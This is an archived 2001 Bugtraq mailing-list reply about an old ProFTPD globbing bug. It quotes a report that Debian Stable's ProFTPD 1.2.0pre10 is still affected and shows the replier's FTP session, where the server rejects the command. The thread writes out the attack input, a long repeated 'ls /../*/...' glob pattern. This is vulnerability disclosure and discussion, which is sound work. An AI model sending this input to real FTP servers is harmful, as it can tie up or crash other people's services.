RE: Multiple-Vendor-FTP-Vuln. (old?)

From: Michael Bellears (michael.bellearsat_private)
Date: Mon Aug 20 2001 - 15:43:54 PDT


    Couldn't reproduce on Debian 2.2....
    
    isp-server-03:/# proftpd -v
     - ProFTPD Version 1.2.0pre10
    
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> bin
    200 Type set to I.
    ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
    200 PORT command successful.
    550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*:
    Forbidden command argument
    ftp> quit
    221 Goodbye.
    
    Regards,
    MB
    
    
    > -----Original Message-----
    > From: Michael Faurot [mailto:mfaurotat_private]
    > Sent: Tuesday, 21 August 2001 5:20 AM
    > To: bugtraqat_private
    > Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
    > 
    > 
    > Enrico Kern <IphantomIat_private> wrote:
    > : Hi,
    > 
    > : I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
    > : many new Linux-Dist..
    > 
    > This bug appears to still be present with Debian Stable (Potato) which
    > uses ProFTPd v1.2.0pre10.
    > 
    > -- 
    > ------------------------------------------------------------------------------
    >  Michael | mfaurot  | Give your child mental blocks for Christmas.
    >  Faurot  | atww.org | 
    > 
    


